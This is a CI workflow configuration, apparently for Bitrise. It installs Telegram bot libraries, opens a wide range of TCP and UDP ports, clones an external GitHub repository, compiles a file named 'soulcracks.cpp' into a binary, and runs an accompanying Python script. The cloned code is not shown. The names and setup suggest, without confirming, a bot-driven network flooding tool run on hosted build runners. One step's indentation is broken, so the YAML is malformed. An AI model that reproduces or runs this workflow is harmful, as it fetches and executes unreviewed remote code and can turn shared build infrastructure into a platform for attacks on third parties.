workflows:
  run_python_file:
    name: Run Python File Workflow
    environment:
      vars:
        PYTHON_VERSION: "3.9.6" # Optional environment variable for Python version reference
    scripts:
      # Install Python and dependencies
      - name: Update and install dependencies
        script: |
          #!/bin/bash
          sudo apt update
          sudo apt install -y g++ python3 python3-pip
          pip3 install pymongo aiohttp TelegramBotAPI telebot
      
      # Configure UFW firewall
      - name: Configure UFW firewall
  script: |
    #!/bin/bash
    if command -v ufw >/dev/null 2>&1; then
      echo "UFW is already installed."
    else
      echo "Installing UFW..."
      sudo apt install -y ufw
    fi
    sudo ufw enable
    sudo ufw allow ssh
    sudo ufw allow http
    sudo ufw allow https
    sudo ufw allow 10000:30000/udp
    sudo ufw allow 10000:30000/tcp
    sudo ufw status
      
      # Configure repository
      - name: Configure Repository
        script: |
          #!/bin/bash
          git clone https://github.com/bobby623974/Anoy1764.git
          cd Anoy1764
          g++ -std=c++14 soulcracks.cpp -o soul -pthread
          mv soul /bitrise/src/soul
          mv soul.py /bitrise/src/soul.py
      
      # Run Python script
      - name: Run Python script
        script: |
          #!/bin/bash
          python3 soul.py
